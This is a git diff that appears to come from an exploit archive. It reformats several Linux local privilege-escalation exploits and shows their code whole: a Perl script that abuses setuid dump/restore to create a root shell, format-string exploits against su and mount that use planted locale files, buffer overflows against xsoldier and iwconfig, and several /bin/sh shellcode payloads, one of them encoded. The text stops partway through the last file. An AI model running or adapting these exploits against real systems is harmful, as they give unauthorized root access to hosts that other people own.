+++ b/platforms/linux/local/184.pl @@ -5,134 +5,134 @@ # written by tlabs # Use at your discretion -$EXPORT1=\"TAPE=garbage:garbage\" ; -$EXPORT2=\"RSH=./hey\" ; +$EXPORT1="TAPE=garbage:garbage" ; +$EXPORT2="RSH=./hey" ; sub USAGE { - print \"$0 \\n1=dump 2=dump.static 3=restore 4=restore.staic\\nYour choice innit;)\\nWritten by Tlabs\\n\" ; + print "$0 \n1=dump 2=dump.static 3=restore 4=restore.staic\nYour choice innit;)\nWritten by Tlabs\n" ; exit 0 ; } sub ERROR { - print \"$_[0]\\n\" ; + print "$_[0]\n" ; exit 0 ; } -open(TEMP, \">shell.c\")|| ERROR(\"Something went wrong:$!\"); -printf TEMP \"#include\\n#include\\nint main()\\n{\" ; -printf TEMP \" setuid(0);\\n\\tsetgid(0);\\n\\texecl(\\\"/bin/sh\\\",\\\"sh\\\",0);\\n\\treturn 0;\\n}\" ; +open(TEMP, ">shell.c")|| ERROR("Something went wrong:$!"); +printf TEMP "#include\n#include\nint main()\n{" ; +printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}" ; close(TEMP); -system \"cc -o shell shell.c\" ; -unlink \"shell.c\" ; -open(TEMP1, \">hey\")|| ERROR(\"Something went wrong: $!\"); -printf TEMP1 \"#!/bin/sh\\nchown root shell\\nchmod 4755 shell\" ; +system "cc -o shell shell.c" ; +unlink "shell.c" ; +open(TEMP1, ">hey")|| ERROR("Something went wrong: $!"); +printf TEMP1 "#!/bin/sh\nchown root shell\nchmod 4755 shell" ; close(TEMP1); -chmod(0755, \"hey\"); +chmod(0755, "hey"); -if ($ARGV[$0] eq \"1\") +if ($ARGV[$0] eq "1") { - $DUMPER=\"/sbin/dump\" ; - if ( -u \"$DUMPER\" ) + $DUMPER="/sbin/dump" ; + if ( -u "$DUMPER" ) { - system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ; + system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ; sleep(3); - if ( -u \"shell\" ) + if ( -u "shell" ) { - unlink \"hey\" ; - system \"./shell\" ; + unlink "hey" ; + system "./shell" ; } else { - unlink \"hey\" ; - unlink \"shell\" ; - print \"Something fucked at the last, sorry\" ; + unlink "hey" ; + unlink "shell" ; + print "Something fucked at the last, sorry" ; } } else { - unlink \"hey\" ; - unlink \"shell\" ; - printf \"Dump is not exploitable on this system\\n\"; + unlink "hey" ; + unlink "shell" ; + printf "Dump is not exploitable on this system\n"; } } -elsif ($ARGV[$0] eq \"2\") +elsif ($ARGV[$0] eq "2") { - $DUMPER=\"/sbin/dump.static\" ; - if ( -u \"$DUMPER\" ) + $DUMPER="/sbin/dump.static" ; + if ( -u "$DUMPER" ) { - system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ; + system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ; sleep(3); - if ( -u \"shell\" ) + if ( -u "shell" ) { - unlink \"hey\" ; - system \"./shell\" ; + unlink "hey" ; + system "./shell" ; } else { - unlink \"hey\" ; - unlink \"shell\" ; - print \"Something fucked at the last, sorry\" ; + unlink "hey" ; + unlink "shell" ; + print "Something fucked at the last, sorry" ; } } else { - unlink \"hey\" ; - unlink \"shell\" ; - printf \"Dump.static is not exploitable on this system\\n\"; + unlink "hey" ; + unlink "shell" ; + printf "Dump.static is not exploitable on this system\n"; } } -elsif ($ARGV[$0] eq \"3\") +elsif ($ARGV[$0] eq "3") { - $RESTORER=\"/sbin/restore\" ; - if ( -u \"$RESTORER\" ) + $RESTORER="/sbin/restore" ; + if ( -u "$RESTORER" ) { - system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ; + system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ; sleep(3); - if ( -u \"shell\" ) + if ( -u "shell" ) { - unlink \"hey\" ; - system \"./shell\" ; + unlink "hey" ; + system "./shell" ; } else { - unlink \"hey\" ; - unlink \"shell\" ; - print \"Something fucked at the last, sorry\" ; + unlink "hey" ; + unlink "shell" ; + print "Something fucked at the last, sorry" ; } } else { - unlink \"hey\" ; - unlink \"shell\" ; - printf \"Restore is not exploitable on this system\\n\"; + unlink "hey" ; + unlink "shell" ; + printf "Restore is not exploitable on this system\n"; } } -elsif ($ARGV[$0] eq \"4\") +elsif ($ARGV[$0] eq "4") { - $RESTORER=\"/sbin/restore.static\" ; - if ( -u \"$RESTORER\" ) + $RESTORER="/sbin/restore.static" ; + if ( -u "$RESTORER" ) { - system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ; + system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ; sleep(3); - if ( -u \"shell\" ) + if ( -u "shell" ) { - unlink \"hey\" ; - system \"./shell\" ; + unlink "hey" ; + system "./shell" ; } else { - unlink \"hey\" ; - unlink \"shell\" ; - print \"Something fucked at the last, sorry\" ; + unlink "hey" ; + unlink "shell" ; + print "Something fucked at the last, sorry" ; } } else { - unlink \"hey\" ; - unlink \"shell\" ; - printf \"Restore.static is not exploitable on this system\\n\"; + unlink "hey" ; + unlink "shell" ; + printf "Restore.static is not exploitable on this system\n"; } } else diff --git a/platforms/linux/local/20185.c b/platforms/linux/local/20185.c index 6cd7c5920..c23a9b6c7 100755 --- a/platforms/linux/local/20185.c +++ b/platforms/linux/local/20185.c @@ -43,16 +43,16 @@ It should be noted under Linux this problem must be exploited in conjunction wit #define DEFAULT_BUFFER_SIZE 2048 #define DEFAULT_EGG_SIZE 1024 #define NOP 0x90 -#define PATH \\\"/tmp/LC_MESSAGES\\\" +#define PATH "/tmp/LC_MESSAGES" char shellcode[] = - \\\"\\\\xeb\\\\x1f\\\\x5e\\\\x89\\\\x76\\\\x08\\\\x31\\\\xc0\\\\x88\\\\x46\\\\x07\\\\x89\\\\x46\\\\x0c\\\\xb0\\\\x0b\\\" - \\\"\\\\x89\\\\xf3\\\\x8d\\\\x4e\\\\x08\\\\x8d\\\\x56\\\\x0c\\\\xcd\\\\x80\\\\x31\\\\xdb\\\\x89\\\\xd8\\\\x40\\\\xcd\\\" - \\\"\\\\x80\\\\xe8\\\\xdc\\\\xff\\\\xff\\\\xff/bin/sh\\\"; + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" + "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" + "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { - __asm__(\\\"movl %esp,%eax\\\"); + __asm__("movl %esp,%eax"); } @@ -65,7 +65,7 @@ unsigned long get_esp(void) { int i,reth,retl,num=113; FILE *fp; - if (argc > 1) sscanf(argv[1],\\\"%x\\\",&retloc); + if (argc > 1) sscanf(argv[1],"%x",&retloc); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) num = atoi(argv[3]); if (argc > 4) align = atoi(argv[4]); @@ -74,27 +74,27 @@ unsigned long get_esp(void) { - printf(\\\"Usages: %s \\\\n\\\",argv[0]); + printf("Usages: %s \n",argv[0]); if (!(buff = malloc(eggsize))) { - printf(\\\"Can\\\'t allocate memory.\\\\n\\\"); + printf("Can't allocate memory.\n"); exit(0); } if (!(buff1 = malloc(bsize))) { - printf(\\\"Can\\\'t allocate memory.\\\\n\\\"); + printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { - printf(\\\"Can\\\'t allocate memory.\\\\n\\\"); + printf("Can't allocate memory.\n"); exit(0); } - printf(\\\"Using RET location address: 0x%x\\\\n\\\", retloc); + printf("Using RET location address: 0x%x\n", retloc); shell_addr = get_esp() + offset; - printf(\\\"Using Shellcode address: 0x%x\\\\n\\\", shell_addr); + printf("Using Shellcode address: 0x%x\n", shell_addr); reth = (shell_addr >> 16) & 0xffff ; retl = (shell_addr >> 0) & 0xffff ; @@ -102,7 +102,7 @@ unsigned long get_esp(void) { ptr = buff; for (i = 0; i <2 ; i++, retloc+=2 ){ - memset(ptr,\\\'A\\\',4); + memset(ptr,'A',4); ptr += 4 ; (*ptr++) = retloc & 0xff; (*ptr++) = (retloc >> 8 ) & 0xff ; @@ -110,27 +110,27 @@ unsigned long get_esp(void) { (*ptr++) = (retloc >> 24 ) & 0xff ; } - memset(ptr,\\\'A\\\',align); + memset(ptr,'A',align); ptr = buff1; for(i = 0 ; i < num ; i++ ) { - memcpy(ptr, \\\"%.8x\\\", 4); + memcpy(ptr, "%.8x", 4); ptr += 4; } - sprintf(ptr, \\\"%%%uc%%hn%%%uc%%hn\\\",(retl - num*8), + sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8), (0x10000 + reth - retl)); mkdir(PATH,0755); chdir(PATH); - fp = fopen(\\\"libc.po\\\", \\\"w+\\\"); - fprintf(fp,\\\"msgid \\\\\\\"%%s: invalid option -- %%c\\\\\\\\n\\\\\\\"\\\\n\\\"); - fprintf(fp,\\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buff1); + fp = fopen("libc.po", "w+"); + fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n"); + fprintf(fp,"msgstr \"%s\\n\"", buff1); fclose(fp); - system(\\\"/usr/bin/msgfmt libc.po -o libc.mo\\\"); + system("/usr/bin/msgfmt libc.po -o libc.mo"); ptr = egg; @@ -140,13 +140,13 @@ unsigned long get_esp(void) { for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; - egg[eggsize - 1] = \\\'\\\\0\\\'; + egg[eggsize - 1] = '\0'; - memcpy(egg, \\\"EGG=\\\", 4); + memcpy(egg, "EGG=", 4); env[0] = egg ; - env[1] = \\\"LANGUAGE=sk_SK/../../../../../../tmp\\\"; + env[1] = "LANGUAGE=sk_SK/../../../../../../tmp"; env[2] = (char *)0 ; - execle(\\\"/bin/su\\\",\\\"su\\\",\\\"-u\\\", buff, NULL,env); + execle("/bin/su","su","-u", buff, NULL,env); } /* end of main */ \ No newline at end of file diff --git a/platforms/linux/local/215.c b/platforms/linux/local/215.c index 0670b0644..a4bcbb767 100755 --- a/platforms/linux/local/215.c +++ b/platforms/linux/local/215.c @@ -6,7 +6,7 @@ * Redhat 6.2 (mount-2.10f) : ./mnt -n 114 -a 0x080565dc -i 112 * compiled on rh 6.2 (mount-2.10m): ./mnt -n 114 -a 0x08059218 -i 112 * - * \\\"objdump /bin/mount | grep exit\\\" to get the -a address + * "objdump /bin/mount | grep exit" to get the -a address * * - sk8 */ @@ -17,32 +17,32 @@ char sc[]= /* main: */ /* setreuid(0, 0); */ - \\\"\\\\x29\\\\xc0\\\" /* subl %eax, %eax */ - \\\"\\\\xb0\\\\x46\\\" /* movb $70, %al */ - \\\"\\\\x29\\\\xdb\\\" /* subl %ebx, %ebx */ - \\\"\\\\xb3\\\\x0c\\\" /* movb $12, %bl */ - \\\"\\\\x80\\\\xeb\\\\x0c\\\" /* subb $12, %bl */ - \\\"\\\\x89\\\\xd9\\\" /* movl %ebx, %ecx */ - \\\"\\\\xcd\\\\x80\\\" /* int $0x80 */ - \\\"\\\\xeb\\\\x18\\\" /* jmp callz */ + "\x29\xc0" /* subl %eax, %eax */ + "\xb0\x46" /* movb $70, %al */ + "\x29\xdb" /* subl %ebx, %ebx */ + "\xb3\x0c" /* movb $12, %bl */ + "\x80\xeb\x0c" /* subb $12, %bl */ + "\x89\xd9" /* movl %ebx, %ecx */ + "\xcd\x80" /* int $0x80 */ + "\xeb\x18" /* jmp callz */ /* start: */ /* execve of /bin/sh */ - \\\"\\\\x5e\\\" /* popl %esi */ - \\\"\\\\x29\\\\xc0\\\" /* subl %eax, %eax */ - \\\"\\\\x88\\\\x46\\\\x07\\\" /* movb %al, 0x07(%esi) */ - \\\"\\\\x89\\\\x46\\\\x0c\\\" /* movl %eax, 0x0c(%esi) */ - \\\"\\\\x89\\\\x76\\\\x08\\\" /* movl %esi, 0x08(%esi) */ - \\\"\\\\xb0\\\\x0b\\\" /* movb $0x0b, %al */ - \\\"\\\\x87\\\\xf3\\\" /* xchgl %esi, %ebx */ - \\\"\\\\x8d\\\\x4b\\\\x08\\\" /* leal 0x08(%ebx), %ecx */ - \\\"\\\\x8d\\\\x53\\\\x0c\\\" /* leal 0x0c(%ebx), %edx */ - \\\"\\\\xcd\\\\x80\\\" /* int $0x80 */ + "\x5e" /* popl %esi */ + "\x29\xc0" /* subl %eax, %eax */ + "\x88\x46\x07" /* movb %al, 0x07(%esi) */ + "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ + "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ + "\xb0\x0b" /* movb $0x0b, %al */ + "\x87\xf3" /* xchgl %esi, %ebx */ + "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ + "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ + "\xcd\x80" /* int $0x80 */ /* callz: */ - \\\"\\\\xe8\\\\xe3\\\\xff\\\\xff\\\\xff\\\" /* call start */ + "\xe8\xe3\xff\xff\xff" /* call start */ /* /bin/sh */ - \\\"\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\"; + "\x2f\x62\x69\x6e\x2f\x73\x68"; int main(int argc, char** argv) { FILE* fp; @@ -50,7 +50,7 @@ int main(int argc, char** argv) { char buffer[20000], fmtbuf[1000], numbuf[2000]; int shloc=0xbfffdaa0; int i=0, c=0; - char mode=\\\'n\\\'; + char mode='n'; int debug=0; int eiploc=0xbffffdc0; char* envbuf[2]; @@ -65,20 +65,20 @@ int main(int argc, char** argv) { memset(buffer, 0, sizeof(buffer)); memset(fmtbuf, 0, sizeof(fmtbuf)); memset(numbuf, 0, sizeof(numbuf)); - printf(\\\"heapaddr: 0x%x\\\\n\\\", heapaddr); + printf("heapaddr: 0x%x\n", heapaddr); c=0; - strcpy (xpath, \\\"/bin/mount\\\"); + strcpy (xpath, "/bin/mount"); - while ((s=getopt(argc, argv, \\\"p:s:b:e:a:n:i:d\\\")) != EOF) { + while ((s=getopt(argc, argv, "p:s:b:e:a:n:i:d")) != EOF) { switch(s) { - case \\\'s\\\': shloc=strtoul(optarg, 0, 0); break; - case \\\'b\\\': bpad=atoi(optarg); break; - case \\\'e\\\': epad=atoi(optarg); break; - case \\\'a\\\': eiploc=strtoul(optarg, 0, 0); break; - case \\\'n\\\': nump=atoi(optarg); break; - case \\\'i\\\': inc=atoi(optarg); break; - case \\\'p\\\': strcpy(xpath, optarg); break; - case \\\'d\\\': debug=1; break; + case 's': shloc=strtoul(optarg, 0, 0); break; + case 'b': bpad=atoi(optarg); break; + case 'e': epad=atoi(optarg); break; + case 'a': eiploc=strtoul(optarg, 0, 0); break; + case 'n': nump=atoi(optarg); break; + case 'i': inc=atoi(optarg); break; + case 'p': strcpy(xpath, optarg); break; + case 'd': debug=1; break; default: } } @@ -87,16 +87,16 @@ int main(int argc, char** argv) { if (epad < 0) epad+=16; for (i=0; i < nump; i++) { - buffer[c++]=\\\'%\\\'; - buffer[c++]=\\\'8\\\'; - buffer[c++]=\\\'x\\\'; + buffer[c++]='%'; + buffer[c++]='8'; + buffer[c++]='x'; } - if (debug) { mode=\\\'p\\\'; - strcpy(sc, \\\"AAAA\\\"); + if (debug) { mode='p'; + strcpy(sc, "AAAA"); numnops=0; } - printf(\\\"cur strlen: %i\\\\n\\\", strlen(buffer)); + printf("cur strlen: %i\n", strlen(buffer)); /* size of executed program (/bin/mount) does not seem to affect these calculations it does affect location of eip however, (which is why its nice to just overwrite exit @@ -111,58 +111,58 @@ int main(int argc, char** argv) { num[3]=((shloc >> 24) & 0xff)+1; if (num[3] < 0) num[3]+=256; - sprintf(fmtbuf, \\\"%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c\\\", num[0] + sprintf(fmtbuf, "%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c", num[0] , mode, num[1], mode, num[2], mode, num[3], mode); - printf(\\\"fmtbuf: %s\\\\n\\\", fmtbuf); - printf(\\\"strlen(fmtbuf): %i\\\\n\\\", strlen(fmtbuf)); + printf("fmtbuf: %s\n", fmtbuf); + printf("strlen(fmtbuf): %i\n", strlen(fmtbuf)); memcpy(buffer+strlen(buffer), fmtbuf, strlen(fmtbuf)); memset(buffer+strlen(buffer), 0x90, numnops); memcpy(buffer+strlen(buffer), sc, strlen(sc)); - mkdir(\\\"/tmp/sk8\\\", 0755); - mkdir(\\\"/tmp/sk8/LC_MESSAGES\\\", 0755); - if ( ! (fp=fopen(\\\"/tmp/sk8/LC_MESSAGES/libc.po\\\", \\\"w\\\") ) ) { - printf(\\\"could not create bad libc.po\\\\n\\\"); + mkdir("/tmp/sk8", 0755); + mkdir("/tmp/sk8/LC_MESSAGES", 0755); + if ( ! (fp=fopen("/tmp/sk8/LC_MESSAGES/libc.po", "w") ) ) { + printf("could not create bad libc.po\n"); exit(-1); } - fprintf(fp, \\\"msgid \\\\\\\"%%s: unrecognized option `--%%s\\\'\\\\\\\\n\\\\\\\"\\\\n\\\"); - fprintf(fp, \\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buffer); + fprintf(fp, "msgid \"%%s: unrecognized option `--%%s'\\n\"\n"); + fprintf(fp, "msgstr \"%s\\n\"", buffer); fclose(fp); - system(\\\"msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo\\\"); + system("msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo"); c=0; - numbuf[c++]=\\\'-\\\'; - numbuf[c++]=\\\'-\\\'; + numbuf[c++]='-'; + numbuf[c++]='-'; - memset(numbuf+strlen(numbuf), \\\'B\\\', bpad); + memset(numbuf+strlen(numbuf), 'B', bpad); - memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4); + memcpy(numbuf+strlen(numbuf), "PPPP", 4); *(long*)(numbuf+strlen(numbuf))=eiploc; - memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4); + memcpy(numbuf+strlen(numbuf), "PPPP", 4); *(long*)(numbuf+strlen(numbuf))=eiploc+1; - memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4); + memcpy(numbuf+strlen(numbuf), "PPPP", 4); *(long*)(numbuf+strlen(numbuf))=eiploc+2; - memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4); + memcpy(numbuf+strlen(numbuf), "PPPP", 4); *(long*)(numbuf+strlen(numbuf))=eiploc+3; - printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf)); - memset(numbuf+strlen(numbuf), \\\'Z\\\', epad); - printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf)); + printf("cur numbuf length: %i\n", strlen(numbuf)); + memset(numbuf+strlen(numbuf), 'Z', epad); + printf("cur numbuf length: %i\n", strlen(numbuf)); - envbuf[0]=\\\"LANGUAGE=en_GB/../../../../tmp/sk8/\\\"; + envbuf[0]="LANGUAGE=en_GB/../../../../tmp/sk8/"; envbuf[1]=0; - printf(\\\"strlen(numbuf): %i\\\\n\\\", strlen(numbuf)); - printf(\\\"bpad: %i; epad: %i\\\\n\\\", bpad, epad); - printf(\\\"number of %%p\\\'s to traverse stack: %i\\\\n\\\", nump); - printf(\\\"address of eip: 0x%x\\\\n\\\", eiploc); - printf(\\\"inc: %i\\\\n\\\", inc); + printf("strlen(numbuf): %i\n", strlen(numbuf)); + printf("bpad: %i; epad: %i\n", bpad, epad); + printf("number of %%p's to traverse stack: %i\n", nump); + printf("address of eip: 0x%x\n", eiploc); + printf("inc: %i\n", inc); - execle(xpath, \\\"mount\\\", numbuf, 0, envbuf); + execle(xpath, "mount", numbuf, 0, envbuf); } diff --git a/platforms/linux/local/229.c b/platforms/linux/local/229.c index 93d2d0460..740ebad55 100755 --- a/platforms/linux/local/229.c +++ b/platforms/linux/local/229.c @@ -7,15 +7,15 @@ #define RANGE 20 unsigned char blah[] = - \"\\xeb\\x03\\x5e\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc6\\x0d\\x31\\xc9\\xb1\\x6c\\x80\\x36\\x01\\x46\\xe2\\xfa\" - \"\\xea\\x09\\x2e\\x63\\x68\\x6f\\x2e\\x72\\x69\\x01\\x80\\xed\\x66\\x2a\\x01\\x01\" - \"\\x54\\x88\\xe4\\x82\\xed\\x1d\\x56\\x57\\x52\\xe9\\x01\\x01\\x01\\x01\\x5a\\x80\\xc2\\xc7\\x11\" - \"\\x01\\x01\\x8c\\xba\\x1f\\xee\\xfe\\xfe\\xc6\\x44\\xfd\\x01\\x01\\x01\\x01\\x88\\x7c\\xf9\\xb9\" - \"\\x47\\x01\\x01\\x01\\x30\\xf7\\x30\\xc8\\x52\\x88\\xf2\\xcc\\x81\\x8c\\x4c\\xf9\\xb9\\x0a\\x01\" - \"\\x01\\x01\\x88\\xff\\x30\\xd3\\x52\\x88\\xf2\\xcc\\x81\\x30\\xc1\\x5a\\x5f\\x5e\\x88\\xed\\x5c\" - \"\\xc2\\x91\"; + "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" + "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" + "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" + "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" + "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" + "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" + "\xc2\x91"; -long get_sp () { __asm__ (\"mov %esp, %eax\"); } +long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) @@ -38,10 +38,10 @@ main (int argc, char *argv[]) for (i = i + strlen (blah); i < BUFSIZE; i += 4) *(long *) &buffer[i] = ret+offset; - fprintf(stderr, \"xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\\n\"); - fprintf(stderr, \"zorgon@antionline.org\\n\"); - fprintf(stderr, \"[return address = %x] [offset = %d] [buffer size = %d]\\n\", ret + offset, offset, BUFSIZE); - execl (\"./xsoldier\", \"xsoldier\", \"-display\", buffer, 0); + fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n"); + fprintf(stderr, "zorgon@antionline.org\n"); + fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE); + execl ("./xsoldier", "xsoldier", "-display", buffer, 0); } diff --git a/platforms/linux/local/23299.c b/platforms/linux/local/23299.c index 493e95b44..287464ea5 100755 --- a/platforms/linux/local/23299.c +++ b/platforms/linux/local/23299.c @@ -19,17 +19,17 @@ Exploit: /* x86/linux shellcode */ char shellcode[]= /* 24 bytes */ - \"\\x31\\xc0\" /* xorl %eax,%eax */ - \"\\x50\" /* pushl %eax */ - \"\\x68\\x2f\\x2f\\x73\\x68\" /* pushl $0x68732f2f */ - \"\\x68\\x2f\\x62\\x69\\x6e\" /* pushl $0x6e69622f */ - \"\\x89\\xe3\" /* movl %esp,%ebx */ - \"\\x50\" /* pushl %eax */ - \"\\x53\" /* pushl %ebx */ - \"\\x89\\xe1\" /* movl %esp,%ecx */ - \"\\x99\" /* cltd */ - \"\\xb0\\x0b\" /* movb $0x0b,%al */ - \"\\xcd\\x80\"; /* int $0x80 */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ + "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ + "\x89\xe3" /* movl %esp,%ebx */ + "\x50" /* pushl %eax */ + "\x53" /* pushl %ebx */ + "\x89\xe1" /* movl %esp,%ecx */ + "\x99" /* cltd */ + "\xb0\x0b" /* movb $0x0b,%al */ + "\xcd\x80"; /* int $0x80 */ int main(int argc,char **argv){ @@ -37,11 +37,11 @@ int main(int argc,char **argv){ unsigned long ret; int i; - char *prog[]={\"/sbin/iwconfig\",buf,NULL}; - char *env[]={\"HOME=/\",shellcode,NULL}; + char *prog[]={"/sbin/iwconfig",buf,NULL}; + char *env[]={"HOME=/",shellcode,NULL}; ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06; - printf(\"use ret addr: 0x%x\\n\",ret); + printf("use ret addr: 0x%x\n",ret); memset(buf,0x41,sizeof(buf)); memcpy(&buf[92],&ret,4); diff --git a/platforms/linux/local/23300.c b/platforms/linux/local/23300.c index 239881eca..11ce9dbf2 100755 --- a/platforms/linux/local/23300.c +++ b/platforms/linux/local/23300.c @@ -15,18 +15,18 @@ A problem has been identified in the iwconfig program when handling strings on t #include -#define BIN \"/sbin/iwconfig\" +#define BIN "/sbin/iwconfig" unsigned char shellcode[] = - \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xc0\\xb0\\x2e\" - \"\\xcd\\x80\\x31\\xc0\\x53\\x68\\x77\\x30\\x30\\x74\\x89\\xe3\" - \"\\xb0\\x27\\xcd\\x80\\x31\\xc0\\xb0\\x3d\\xcd\\x80\\x31\\xc0\" - \"\\x31\\xdb\\x31\\xc9\\xb1\\x0a\\x50\\x68\\x2e\\x2e\\x2f\\x2f\" - \"\\xe2\\xf9\\x89\\xe3\\xb0\\x0c\\xcd\\x80\\x31\\xc0\\x31\\xdb\" - \"\\x6a\\x2e\\x89\\xe3\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\\xdb\" - \"\\x31\\xc9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\" - \"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\" - \"\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\"; + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e" + "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3" + "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0" + "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f" + "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb" + "\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb" + "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" + "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd" + "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80"; int main () @@ -40,7 +40,7 @@ main () *(add_ptr++)=ret_add; memset ((char *)out, 0x90, 1337); memcpy ((char *)out + 333, shellcode, strlen(shellcode)); - memcpy((char *)out, \"OUT=\", 4); + memcpy((char *)out, "OUT=", 4); putenv(out); execl (BIN, BIN, buf, NULL); return 0; diff --git a/platforms/linux/local/23301.c b/platforms/linux/local/23301.c index da07fec1f..9070fe205 100755 --- a/platforms/linux/local/23301.c +++ b/platforms/linux/local/23301.c @@ -21,7 +21,7 @@ A problem has been identified in the iwconfig program when handling strings on t */ /* - * Yet another Proof Of Concept Xploit for \'iwconfig\' + * Yet another Proof Of Concept Xploit for 'iwconfig' */ @@ -32,8 +32,8 @@ A problem has been identified in the iwconfig program when handling strings on t #define RET 0xbffffc3f char shellcode[]= -\"\\xeb\\x17\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\" -\"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\"; +"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" +"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; int main(int argc,char **argv) { @@ -49,7 +49,7 @@ int main(int argc,char **argv) memcpy(buff+i,shellcode,strlen(shellcode)); - execl(\"/sbin/iwconfig\",\"iwconfig\",buff,(char *)NULL); + execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL); return 0; } diff --git a/platforms/linux/local/249.c b/platforms/linux/local/249.c index 878c12f46..60c0b2ab0 100755 --- a/platforms/linux/local/249.c +++ b/platforms/linux/local/249.c @@ -9,23 +9,23 @@ #include char *shellcode = -\"\\x31\\xc0\\x83\\xc0\\x17\\x31\\xdb\\xcd\\x80\\xeb\" -\"\\x30\\x5f\\x31\\xc9\\x88\\x4f\\x17\\x88\\x4f\\x1a\" -\"\\x8d\\x5f\\x10\\x89\\x1f\\x8d\\x47\\x18\\x89\\x47\" -\"\\x04\\x8d\\x47\\x1b\\x89\\x47\\x08\\x31\\xc0\\x89\" -\"\\x47\\x0c\\x8d\\x0f\\x8d\\x57\\x0c\\x83\\xc0\\x0b\" -\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\" -\"\\xcb\\xff\\xff\\xff\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" 